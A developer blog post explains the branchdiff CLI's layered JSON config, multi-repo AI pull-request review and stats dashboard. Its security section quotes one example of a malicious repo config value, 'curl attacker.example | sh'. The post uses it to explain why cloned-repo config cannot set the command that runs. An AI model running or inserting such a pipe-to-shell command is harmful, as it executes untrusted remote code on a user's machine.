<!DOCTYPE html><html lang="en"> <head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Configure Once, Review Everywhere - branchdiff&#39;s Config System and Multi-Repo auto — Ankur’s Writing</title><meta name="description" content="You maintain six repos. Every morning you open a terminal, cd into the first one, and type the same line you've typed a hundred times: branchdiff auto --tool…"><meta name="robots" content="index, follow, max-image-preview:large"><link rel="canonical" href="https://encryptioner.github.io/blogs/blog/configure-once-review-everywhere-branchdiff-s-config-system-and-multi-repo-auto/"><link rel="alternate" type="application/rss+xml" title="Ankur’s Writing" href="https://encryptioner.github.io/blogs/rss.xml"><meta property="og:type" content="article"><meta property="og:site_name" content="Ankur’s Writing"><meta property="og:locale" content="en_US"><meta property="og:title" content="Configure Once, Review Everywhere - branchdiff's Config System and Multi-Repo auto — Ankur’s Writing"><meta property="og:description" content="You maintain six repos. Every morning you open a terminal, cd into the first one, and type the same line you've typed a hundred times: branchdiff auto --tool…"><meta property="og:url" content="https://encryptioner.github.io/blogs/blog/configure-once-review-everywhere-branchdiff-s-config-system-and-multi-repo-auto/"><meta property="og:image" content="https://encryptioner.github.io/logo.png"><meta property="og:image:alt" content="Configure Once, Review Everywhere - branchdiff's Config System and Multi-Repo auto — Ankur’s Writing"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="Configure Once, Review Everywhere - branchdiff's Config System and Multi-Repo auto — Ankur’s Writing"><meta name="twitter:description" content="You maintain six repos. Every morning you open a terminal, cd into the first one, and type the same line you've typed a hundred times: branchdiff auto --tool…"><meta name="twitter:image" content="https://encryptioner.github.io/logo.png"><meta name="twitter:creator" content="@AnkurMursalin"><meta name="twitter:site" content="@AnkurMursalin"><meta name="author" content="Mir Mursalin Ankur"><meta property="article:author" content="https://encryptioner.github.io"><meta property="article:published_time" content="2026-08-02"><meta property="article:modified_time" content="2026-08-09"><meta property="article:section" content="Productivity"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Person","@id":"https://encryptioner.github.io/blogs#author","name":"Mir Mursalin Ankur","alternateName":"Ankur","jobTitle":"Lead Software Engineer","url":"https://encryptioner.github.io","sameAs":["https://github.com/Encryptioner","https://www.linkedin.com/in/mir-mursalin-ankur","https://dev.to/mir_mursalin_ankur","https://mir-mursalin-ankur.medium.com/","https://twitter.com/AnkurMursalin","https://nerddevs.com/author/ankur/"]},{"@type":"WebSite","@id":"https://encryptioner.github.io/blogs#website","url":"https://encryptioner.github.io/blogs","name":"Ankur’s Writing","description":"I lead full-stack teams at NerdDevs. These are the notes I keep while building — on system design, developer tooling, and getting real work out of AI agents.","inLanguage":"en","publisher":{"@id":"https://encryptioner.github.io/blogs#author"},"potentialAction":{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://encryptioner.github.io/blogs/search?q={search_term_string}"},"query-input":"required name=search_term_string"}},{"@type":"BlogPosting","@id":"https://encryptioner.github.io/blogs/blog/configure-once-review-everywhere-branchdiff-s-config-system-and-multi-repo-auto/#article","headline":"Configure Once, Review Everywhere - branchdiff's Config System and Multi-Repo auto — Ankur’s Writing","description":"You maintain six repos. Every morning you open a terminal, cd into the first one, and type the same line you've typed a hundred times: branchdiff auto --tool…","url":"https://encryptioner.github.io/blogs/blog/configure-once-review-everywhere-branchdiff-s-config-system-and-multi-repo-auto/","image":"https://encryptioner.github.io/logo.png","datePublished":"2026-08-02","dateModified":"2026-08-09","author":{"@id":"https://encryptioner.github.io/blogs#author"},"publisher":{"@id":"https://encryptioner.github.io/blogs#author"},"isPartOf":{"@id":"https://encryptioner.github.io/blogs#website"},"mainEntityOfPage":"https://encryptioner.github.io/blogs/blog/configure-once-review-everywhere-branchdiff-s-config-system-and-multi-repo-auto/","inLanguage":"en","articleSection":"Productivity","wordCount":3147}]}</script><script data-theme-init>
      try {
        var stored = localStorage.getItem('theme');
        if (stored === 'light' || stored === 'dark') {
          document.documentElement.dataset.theme = stored;
        }
      } catch (error) {
        /* storage blocked — fall through to the OS preference */
      }
    </script><link rel="icon" href="/blogs/favicon.svg" type="image/svg+xml"><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&family=Newsreader:ital,opsz,wght@0,6..72,400;0,6..72,500;0,6..72,600;1,6..72,400&display=swap" rel="stylesheet"><link rel="stylesheet" href="/blogs/_astro/_slug_.CnVfJtEm.css">
<link rel="stylesheet" href="/blogs/_astro/_slug_.Dazhf5Fi.css"></head> <body data-slug="configure-once-review-everywhere-branchdiff-s-config-system-and-multi-repo-auto"> <a class="skip-link" href="#main">Skip to content</a> <header class="topbar"> <div class="shell topbar-inner"> <a class="brand" href="/blogs/"> <svg class="logo" width="30" height="30" viewBox="0 0 32 32" aria-hidden="true" focusable="false"> <rect width="32" height="32" rx="9" fill="var(--accent)"></rect> <path d="M9.4 23.6 16 8.4l6.6 15.2" fill="none" stroke="var(--on-accent)" stroke-width="2.9" stroke-linecap="round" stroke-linejoin="round"></path> <path d="M12.5 18.7h7" fill="none" stroke="var(--on-accent)" stroke-width="2.9" stroke-linecap="round"></path> </svg> <span>Ankur’s Writing</span> </a> <div class="topbar-end"> <nav class="nav" aria-label="Primary"> <a href="/blogs/" data-nav-key="all"> All </a><a href="/blogs/?type=blog" data-nav-key="blog" aria-current="page"> Blogs </a><a href="/blogs/?type=presentation" data-nav-key="presentation"> Presentations </a><a href="/blogs/search" data-nav-key="search"> Search </a> </nav> <button class="theme-toggle" type="button" data-theme-toggle aria-pressed="false"> <svg class="icon-moon" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <path d="M21 12.8A9 9 0 1 1 11.2 3a7 7 0 0 0 9.8 9.8Z"></path> </svg> <svg class="icon-sun" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <circle cx="12" cy="12" r="4"></circle> <path d="M12 2v2m0 16v2M4.9 4.9l1.4 1.4m11.4 11.4 1.4 1.4M2 12h2m16 0h2M4.9 19.1l1.4-1.4M17.7 6.3l1.4-1.4"></path> </svg> <span class="visually-hidden">Toggle theme</span> </button> </div> </div> </header> <main id="main">  <div class="progress" data-progress hidden aria-hidden="true"></div> <article class="shell article"> <nav class="crumbs mono" aria-label="Breadcrumb"> <a href="/blogs/">Home</a> <span aria-hidden="true">/</span> <a href="/blogs/?topic=Productivity">Productivity</a>  <span aria-hidden="true">/</span> <span>branchdiff</span>  </nav> <header class="article-head"> <div class="tags"> <span class="tag tag--type">Blog</span> <a class="tag" href="/blogs/?topic=Productivity">Productivity</a> <span class="tag">branchdiff</span> </div> <h1>Configure Once, Review Everywhere - branchdiff&#39;s Config System and Multi-Repo auto</h1> <p class="article-meta mono"> <time datetime="2026-08-09">9 Aug 2026</time> <span>·</span> <span>16 min read</span> <span>·</span> <span>3,147 words</span> </p> </header> <div class="prose"><p>You maintain six repos. Every morning you open a terminal, <code>cd</code> into the first one, and type the same line you’ve typed a hundred times: <code>branchdiff auto --tool claude --skill --resolve --approve 2 --push --notify --worktree</code>. Then you <code>cd</code> into the second repo and type it again. By the fourth repo you’ve mistyped <code>--approve</code> as <code>--aprove</code> once, silently skipped <code>--push</code> on another, and you’re no longer sure which repo actually got the strict review policy you meant to apply everywhere.</p>
<p>This is the same problem <code>.eslintrc</code> solved for linting fifteen years ago: a policy that lives in a file instead of in your fingers. Nobody re-types their lint rules into the CLI on every run — they write them once, commit them, and every invocation of <code>eslint</code> picks them up automatically. <code>auto</code>’s new config file does the same thing for how AI reviews your PRs. And once the policy is a file instead of a memorized flag string, there’s no reason to run it one repo at a time — you can point a single <code>auto</code> invocation at every repo you maintain and let it work through all of them in one pass.</p>
<p>There’s a catch worth taking seriously before you reach for it: a config file that any cloned repo can carry is also a config file that could, in principle, tell branchdiff to run a shell command on your machine. The design closes that door deliberately, and it’s worth understanding exactly how — because “configure once” only works if you trust it not to be hijacked by the ninth repo you clone.</p>
<hr />
<h2 id="two-files-one-merged-config">Two files, one merged config</h2>
<p>branchdiff reads defaults from up to two JSON files:</p>
<ul>
<li><strong><code>~/.branchdiff/config.json</code></strong> — global, applies to every repo on the machine.</li>
<li><strong><code>.branchdiff.json</code></strong> — local, dropped in a repo’s root (or wherever you launch <code>auto</code> from).</li>
</ul>
<p>Each file has the same two top-level keys. <code>defaults</code> mirrors the root command’s flags — the ones that control how a single diff view opens:</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="json"><code><span class="line"><span style="color:#ABB2BF">{</span></span>
<span class="line"><span style="color:#E06C75">  "defaults"</span><span style="color:#ABB2BF">: {</span></span>
<span class="line"><span style="color:#E06C75">    "mode"</span><span style="color:#ABB2BF">: </span><span style="color:#98C379">"unified"</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "port"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">5391</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "dark"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">true</span></span>
<span class="line"><span style="color:#ABB2BF">  }</span></span>
<span class="line"><span style="color:#ABB2BF">}</span></span></code></pre>
<p><code>auto</code> mirrors every flag <code>auto</code> itself accepts — including <code>tool</code>, shown below, which (see the exec/tool section further down) only actually takes effect from this global file, never from a repo’s own <code>.branchdiff.json</code>:</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="json"><code><span class="line"><span style="color:#ABB2BF">{</span></span>
<span class="line"><span style="color:#E06C75">  "auto"</span><span style="color:#ABB2BF">: {</span></span>
<span class="line"><span style="color:#E06C75">    "tool"</span><span style="color:#ABB2BF">: </span><span style="color:#98C379">"claude"</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "skill"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">true</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "resolve"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">true</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "approve"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">2</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "push"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">true</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "notify"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">true</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "worktree"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">true</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "maxFiles"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">200</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "maxLines"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">4000</span><span style="color:#ABB2BF">,</span></span>
<span class="line"><span style="color:#E06C75">    "skipAuthor"</span><span style="color:#ABB2BF">: </span><span style="color:#D19A66">true</span></span>
<span class="line"><span style="color:#ABB2BF">  }</span></span>
<span class="line"><span style="color:#ABB2BF">}</span></span></code></pre>
<p>Drop the global file at <code>~/.branchdiff/config.json</code> and every repo on the machine inherits that policy — strictness level, which AI tool to drive, whether to push automatically — without a single flag on the command line. Now <code>branchdiff auto</code> alone does what the six-flag version used to do.</p>
<hr />
<h2 id="precedence-what-wins-when-files-disagree">Precedence: what wins when files disagree</h2>
<p>The rule is short: <strong>a flag you actually type always wins. After that, the more local file wins over the more global one.</strong></p>
<p>For a single-repo run that’s just two layers — CLI flag beats <code>.branchdiff.json</code> beats <code>~/.branchdiff/config.json</code>. For a multi-repo <code>auto</code> run there’s a third layer in between: the launch directory’s own <code>.branchdiff.json</code> (if you’re running <code>auto</code> from a parent folder that isn’t itself a repo) sits between global and each individual repo’s file.</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="plaintext"><code><span class="line"><span>CLI flag  &gt;  repo's own .branchdiff.json  &gt;  launch-dir .branchdiff.json  &gt;  ~/.branchdiff/config.json</span></span></code></pre>
<p>Concrete example: global config sets <code>"approve": 1</code> (block only <code>[must-fix]</code>). Your <code>payments-api</code> repo is stricter — its own <code>.branchdiff.json</code> sets <code>"approve": 3</code>. Every other repo you maintain gets level 1, <code>payments-api</code> gets level 3, and if you ever run <code>auto --approve 5</code> by hand for a one-off audit, that beats both — for that invocation only.</p>
<p><strong>One important exception to “per-repo config”:</strong> a handful of <code>auto</code> keys describe the <em>launch itself</em>, not any one repo’s review — <code>repoPaths</code>, <code>repoConcurrency</code>, <code>keepServers</code>, <code>watch</code>, <code>forceSession</code>, and also <code>detach</code>/<code>yes</code>. These resolve <strong>once</strong>, before any repo is scanned, from CLI flag → launch-dir file → global file. A repo’s own <code>.branchdiff.json</code> can’t change how many repos run concurrently or whether the whole pass runs detached — those decisions are made before that repo’s file is even read.</p>
<hr />
<h2 id="the-one-deliberate-exception-exec-and-tool-are-never-trusted-from-a-cloned-repo">The one deliberate exception: exec and tool are never trusted from a cloned repo</h2>
<p>Here’s the callout that matters most if you’re going to lean on this system across repos you didn’t write yourself.</p>
<p><code>auto.exec</code> and <code>auto.tool</code> — the settings that decide <em>what actually runs the review</em> — are honored only from the <strong>global</strong> config or a CLI flag. Never from a <code>.branchdiff.json</code>.</p>
<p>The reason: <code>.branchdiff.json</code> can arrive in your working copy via <code>git clone</code>. If a <code>.branchdiff.json</code> in someone else’s repo could set <code>exec</code>, that repo could ship <code>"exec": "curl attacker.example | sh"</code> and have it run on your machine the moment you pointed <code>auto</code> at it. Config files that travel with the repo do not get to choose the command that executes on your behalf — only config you control (global) or type yourself (CLI) does.</p>
<p><code>yes</code> gets a related rule, for a parallel reason. It pre-answers the “review these discovered repos unattended?” prompt — and that prompt exists specifically to stop a repo from silently including itself in an unattended run. So a <em>discovered</em> repo’s own <code>.branchdiff.json</code> can never set <code>yes</code>; only your own launch-dir or global config can.</p>
<p>Everything else in <code>auto</code> — <code>resolve</code>, <code>approve</code>, <code>maxFiles</code>, <code>notify</code>, <code>worktree</code>, and the rest — is fair game per repo, because none of it can execute arbitrary code or bypass a consent gate. A <code>.branchdiff.json</code> can make its own repo’s reviews stricter or looser. It cannot make branchdiff run something it wasn’t told to run globally, and it cannot vouch for its own repo being safe to scan.</p>
<hr />
<h2 id="seeing-whats-actually-in-effect">Seeing what’s actually in effect</h2>
<p>Two commands exist so you never have to guess which file won.</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> config</span></span></code></pre>
<p>prints the fully merged, effective config — every key, its resolved value, and which file it came from. A key nobody ever set doesn’t show as “unset” — it shows branchdiff’s real built-in default, so <code>branchdiff config</code> is a complete picture of how the next <code>auto</code> run will actually behave, not just a diff of what you changed. Two flags extend it: <code>config --json</code> emits the whole resolved hierarchy as JSON, including every direct child repo of the launch directory — so a script or an AI agent can read which tier won without parsing the text — and <code>config --dir &lt;launchDir&gt;</code> resolves against a different directory than the current one. Point it at a parent folder and it expands to one block per child repo, the same view the stats dashboard’s Configs section renders (see below).</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> config</span><span style="color:#98C379"> sample</span></span>
<span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> config</span><span style="color:#98C379"> sample</span><span style="color:#D19A66"> --global</span></span></code></pre>
<p>scaffolds a starter file — a handful of commonly-useful keys, not every possible flag — at <code>.branchdiff.json</code> or, with <code>--global</code>, at <code>~/.branchdiff/config.json</code>. It refuses to overwrite a file that already exists unless you pass <code>--force</code>, so running it a second time by habit doesn’t clobber a config you’ve since hand-edited.</p>
<p>For when that curated set isn’t enough, use <code>config sample --full</code>: it writes <em>every</em> key that has a fixed built-in default, grouped under the correct <code>defaults</code>/<code>auto</code> section, instead of the starter handful. Keys that have no fixed default (<code>maxFiles</code>, <code>base</code>, <code>skillName</code>, …) aren’t written into the JSON — but they’re listed by name in a note beneath it, so you know they exist and can add them yourself when a repo actually needs them.</p>
<p>Two failure modes, handled differently on purpose:</p>





























<table><thead><tr><th>Problem</th><th>Behavior</th></tr></thead><tbody><tr><td>Malformed JSON in a config file</td><td>Fails clearly, naming the exact file that’s broken</td></tr><tr><td>Unrecognized key in a config file</td><td>Warns (names the key and the file), does not fail</td></tr><tr><td>Bad per-repo config, single-repo run</td><td>That run fails</td></tr><tr><td>Bad per-repo config, multi-repo <code>auto</code> run</td><td>Only that one repo is skipped; the rest of the pass proceeds</td></tr><tr><td>Bad global or launch-dir config, multi-repo <code>auto</code> run</td><td>Stops the whole run before it starts</td></tr></tbody></table>
<p>That last row is the one to remember: a typo in one repo’s <code>.branchdiff.json</code> costs you one repo for that cycle, not the whole morning’s review pass.</p>
<hr />
<h2 id="multi-repo-auto-the-payoff">Multi-repo auto: the payoff</h2>
<p>This is where “configure once” earns its keep. Run <code>auto</code> from a directory that isn’t itself a git repo — say, the parent folder that holds all your work — and it reviews every git repo directly beneath it:</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#56B6C2">cd</span><span style="color:#98C379"> ~/work</span></span>
<span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> auto</span><span style="color:#D19A66"> --review</span></span></code></pre>
<p>Or name repos explicitly, comma-separated, repeatable, mixing absolute, relative, and <code>~</code>-prefixed paths:</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> auto</span><span style="color:#D19A66"> --repo-paths</span><span style="color:#98C379"> ~/work/api,../web,~/work/internal-tools</span><span style="color:#D19A66"> --review</span></span></code></pre>
<p>Repos are scanned together, capped by <code>--repo-concurrency</code> (default 4 at a time — reviews themselves still run one repo at a time). Their open PRs come back as one combined, per-repo-grouped list, and you pick once — comma-separated numbers, a range like <code>1-5</code>, <code>a</code> for all, <code>q</code> to quit — instead of picking separately for every repo. After that, reviews run repo by repo, and every other <code>auto</code> flag (and every config-file default) applies per repo exactly as it would in a single-repo run.</p>
<p>Because a parent directory can quietly contain repos you weren’t thinking about, <code>auto</code> asks once before reviewing discovered repos unattended — naming them explicitly with <code>--repo-paths</code> skips that prompt, since you’ve already told it exactly what you meant to include.</p>
<p>A few flags exist specifically for the multi-repo case:</p>
<ul>
<li><strong><code>--keep-servers &lt;n|all&gt;</code></strong> — how many session servers a cycle leaves alive when it’s done, one number for the whole pass (<code>all</code> retires none).</li>
<li><strong><code>--watch</code></strong> — keeps <code>auto</code> running across cycles; a repo newly cloned into the parent directory is picked up and joins the next cycle automatically.</li>
</ul>
<p>Every pass that reviewed something ends with a report, grouped by repo:</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="plaintext"><code><span class="line"><span>  Reviewed this cycle (under ~/work)</span></span>
<span class="line"><span>    payments-api  ~/work/payments-api</span></span>
<span class="line"><span>      done   github #142 fix/refund → main — 3 comments  https://github.com/org/payments-api/pull/142</span></span>
<span class="line"><span>             session http://localhost:5391 — running</span></span>
<span class="line"><span></span></span>
<span class="line"><span>  skip  6 PRs outside the size bounds</span></span></code></pre>
<p>A skipped PR doesn’t get its own row — it’s rolled into that one-line tally, so a bound quietly eating a whole cycle’s candidates is still visible without scrolling past every skip.</p>
<p>And the exit code tells a script what happened without parsing that report: <code>0</code> for a clean pass, <code>1</code> when nothing was attempted, <code>2</code> when something was skipped or failed. That’s what makes “review every repo I maintain” safe to put behind a cron job instead of something you babysit.</p>
<hr />
<h2 id="checking-the-policy-actually-worked-branchdiff-stats">Checking the policy actually worked: <code>branchdiff stats</code></h2>
<p>A per-cycle report is fine for “did this run go okay,” but it doesn’t answer “is the policy I set actually doing anything, across every repo, over the last month.” <code>branchdiff stats</code> does — it aggregates across every repo branchdiff has touched by default, or scope it to the current one with <code>--repo</code>. <code>--days &lt;n&gt;</code> (default 30, <code>0</code> for all time) or <code>--since</code>/<code>--until</code> set the window. There’s also <code>--today</code> for the current calendar day — a <code>Today</code> chip sits next to <code>All</code> / <code>90d</code> / <code>30d</code> / <code>7d</code> on the dashboard, and <code>--today</code> mirrors it on the CLI (it can’t be combined with <code>--days</code>/<code>--since</code>/<code>--until</code>).</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> stats</span><span style="color:#7F848E;font-style:italic">           # opens a dashboard in the browser</span></span>
<span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> stats</span><span style="color:#D19A66"> --no-open</span><span style="color:#7F848E;font-style:italic"> # print a text summary instead</span></span>
<span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> stats</span><span style="color:#D19A66"> --json</span><span style="color:#7F848E;font-style:italic">    # machine-readable, for a script</span></span>
<span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> stats</span><span style="color:#D19A66"> --share</span><span style="color:#7F848E;font-style:italic">   # a markdown summary worth pasting into a PR or standup</span></span></code></pre>
<p>The text summary breaks down how many reviews you’ve run and how many are still open, comment/thread status, the GitHub vs. Bitbucket split, and — the part that matters here — the verdict breakdown your <code>--approve</code>/<code>--request-changes</code> policy actually produced: approved, changes requested, commented. That’s the direct payoff of this whole config system: you set <code>"approve": 2</code> globally and <code>"approve": 3</code> for <code>payments-api</code> weeks ago; <code>branchdiff stats</code> is where you go to see whether that split held up in practice, not just trust that it did.</p>
<p>The dashboard itself has two things worth knowing about. A <strong>Configs</strong> section browses the resolved config hierarchy for any launch directory — <code>defaults</code> → <code>auto</code> → per-repo → <code>exec/tool</code> — with a per-key table showing which tier actually won, the same answer <code>branchdiff config --dir</code> prints but clickable, with copy-path / copy-content / open-in-editor on each file. And every section of the dashboard — running instances, auto sessions, cron schedules, configs — carries its own <strong>Refresh</strong> button, alongside a global one, so you can re-pull a single section on demand instead of reloading the page. That matters for <code>auto</code>: leave the dashboard open, hit Refresh on Auto sessions after a cron fire, and watch the latest runs land without re-navigating.</p>
<hr />
<h2 id="your-own-activity-across-both-forges">Your own activity, across both forges</h2>
<p><code>branchdiff stats</code> is also where you pull a report of <em>your own</em> pull-request activity across both GitHub and Bitbucket — the <strong>Platform activity</strong> button in the dashboard toolbar. It answers the “what have I actually been doing as a reviewer this month?” question without you tab-hopping through two forges and a spreadsheet.</p>
<p>It is a query-builder, not an auto-load. You pick a date range (seeded from the dashboard’s current window), toggle which platforms and which of four dimensions you want — <strong>PRs authored</strong>, <strong>PRs approved/reviewed</strong>, <strong>commits pushed</strong>, and <strong>comments/reviews given</strong> — then click <strong>Fetch</strong>. Nothing runs until you do, so a glance at one dimension costs only that one query. Each dimension carries a cost badge — <em>fast</em> (authored, approved, on by default), <em>medium</em> (commits), or <em>slow · per-PR walk</em> (comments, which has to fetch each PR’s review history, so it starts unchecked) — so you can drop the expensive one when all you need is a tally. The two platforms fetch independently: one can come back with results while the other reports a missing credential or rate-limit inline, without aborting the other.</p>
<p>Results open in a near-full-screen modal with a sticky filter bar — a repo filter and a search box, plus an <strong>All / GitHub / Bitbucket</strong> platform toggle that only appears when both platforms actually contributed data, since a single-platform report has nothing to switch between. Atop the results sits an <strong>Insights</strong> card that summarizes the whole report at a glance, scoped to exactly what you queried and to the toggle: at <strong>All</strong> it covers both platforms combined, and switching to one re-derives every figure for just that platform, with no re-fetch (both variants are computed up front). It surfaces the activity counts, the review-verdict breakdown, commits split by category with the top ticket IDs, your busiest day — and the one a raw tally hides: how many of your reviews and comments landed on <em>other people’s PRs</em>, the collaboration signal that authored and reviewed work mix together. Each figure renders only for a dimension you actually checked, so an unchecked dimension reads as absent rather than as a misleading zero.</p>
<p>A <strong>By PR</strong> rollup joins authored, reviewed, and commented per PR — so PRs you reviewed or commented on but did not author appear too — and each row carries a 💬 button to view that PR’s comments inline: Bitbucket fetches them on demand (the automatic scan only covers PRs you authored or reviewed), while GitHub already has them in the report, so the count shows from the start and stays visible once known. Below it, the per-platform tables carry a <strong>Verdict</strong> column — approved, changes-requested, or commented, naming <em>who approved it instead</em> on changes-requested rows (Bitbucket pulls that from the PR’s participants, GitHub fetches it for that set) — and a <strong>Ticket</strong> column that pulls each branch’s ticket ID out of its name. <strong>Copy all</strong> exports the whole report as markdown, led by that combined summary; each platform section has its own <strong>Copy</strong> for just that slice, both confirming with an in-button ✓.</p>
<p>Scope is your tracked repos — the ones you have run <code>branchdiff</code> in, surfaced so adding a repo is obvious; there is no separate registration step. <code>branchdiff stats</code> auto-opens the dashboard, reusing an already-running instance, or reach it from the <strong>3-dot menu → Stats</strong>, with <code>--no-open</code>, <code>--json</code>, and <code>--share</code> for scripting.</p>
<hr />
<h2 id="where-to-stay-skeptical">Where to stay skeptical</h2>
<p><strong>Config is a default, not a guarantee.</strong> A CLI flag always overrides it — which is correct, but it also means a config file can lull you into assuming a policy is in force when someone (including past-you) typed a one-off flag that quietly won for that run.</p>
<p><strong><code>--repo-concurrency</code> and <code>--keep-servers</code> trade speed for local resource use.</strong> Scanning ten repos at concurrency 4 is faster than one at a time, but it’s also ten repos’ worth of git operations and session servers competing for the same machine. Start conservative on a laptop.</p>
<p><strong>The unattended-discovery prompt is a speed bump, not a security boundary.</strong> It stops you from accidentally reviewing a repo you forgot was in that folder. It does not vet the repo’s contents — a malicious <code>.branchdiff.json</code> still can’t run <code>exec</code>, but the repo’s actual code is whatever it is, same as any clone.</p>
<p><strong>A skipped repo in a multi-repo report is easy to miss if you don’t read the report.</strong> Exit code <code>2</code> tells a script something went wrong; it doesn’t tell you <em>what</em> without reading the printed grouping. Pipe the report somewhere you’ll actually see it if you’re running this unattended.</p>
<p><strong><code>branchdiff config</code> shows resolved values, not intent.</strong> If a key’s built-in default happens to match what you meant to set, you can’t tell from the output alone whether your file actually took effect or whether you’re looking at the default by coincidence. When in doubt, change the value to something distinctive and re-run <code>config</code> to confirm it moved.</p>
<p><strong><code>stats</code> reflects what got recorded, not what you intended.</strong> A review whose <code>--push</code> failed partway (network blip, permissions) still counts as a review locally even though the remote verdict never landed — the verdict breakdown can look stricter or looser than what’s actually visible on your PRs. Cross-check against the platform occasionally, especially right after changing an <code>approve</code> level.</p>
<hr />
<h2 id="quick-start">Quick start</h2>
<p>Full install guide, changelog, and uninstall steps on the <a href="https://encryptioner.github.io/branchdiff-releases/" target="_blank" rel="noopener noreferrer">branchdiff releases page</a>.</p>
<pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf;overflow-x:auto;white-space:pre-wrap;word-wrap:break-word" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">npm</span><span style="color:#98C379"> install</span><span style="color:#D19A66"> -g</span><span style="color:#98C379"> @encryptioner/branchdiff</span></span>
<span class="line"><span style="color:#7F848E;font-style:italic"># or: pip install branchdiff</span></span>
<span class="line"><span style="color:#7F848E;font-style:italic"># or: brew tap encryptioner/branchdiff https://github.com/encryptioner/branchdiff-releases \</span></span>
<span class="line"><span style="color:#7F848E;font-style:italic">#          &amp;&amp; brew install branchdiff</span></span>
<span class="line"></span>
<span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> config</span><span style="color:#98C379"> sample</span><span style="color:#D19A66"> --global</span><span style="color:#7F848E;font-style:italic">        # scaffold ~/.branchdiff/config.json</span></span>
<span class="line"><span style="color:#7F848E;font-style:italic"># edit it: set your default tool, approve level, notify, etc.</span></span>
<span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> config</span><span style="color:#7F848E;font-style:italic">                        # confirm what's actually in effect</span></span>
<span class="line"></span>
<span class="line"><span style="color:#56B6C2">cd</span><span style="color:#98C379"> ~/work</span></span>
<span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> auto</span><span style="color:#D19A66"> --review</span><span style="color:#7F848E;font-style:italic">                 # reviews every repo directly under here</span></span>
<span class="line"><span style="color:#7F848E;font-style:italic"># or: branchdiff auto --repo-paths ~/work/api,~/work/web --review</span></span>
<span class="line"></span>
<span class="line"><span style="color:#61AFEF">branchdiff</span><span style="color:#98C379"> stats</span><span style="color:#7F848E;font-style:italic">                         # see the policy's actual effect, across every repo</span></span></code></pre>
<p>Once the policy lives in a file, “review my open PRs” stops being a command you remember and becomes a command you alias — or schedule — because it behaves identically, and safely, across every repo you maintain.</p>
<hr />
<h2 id="lets-connect">Let’s Connect</h2>
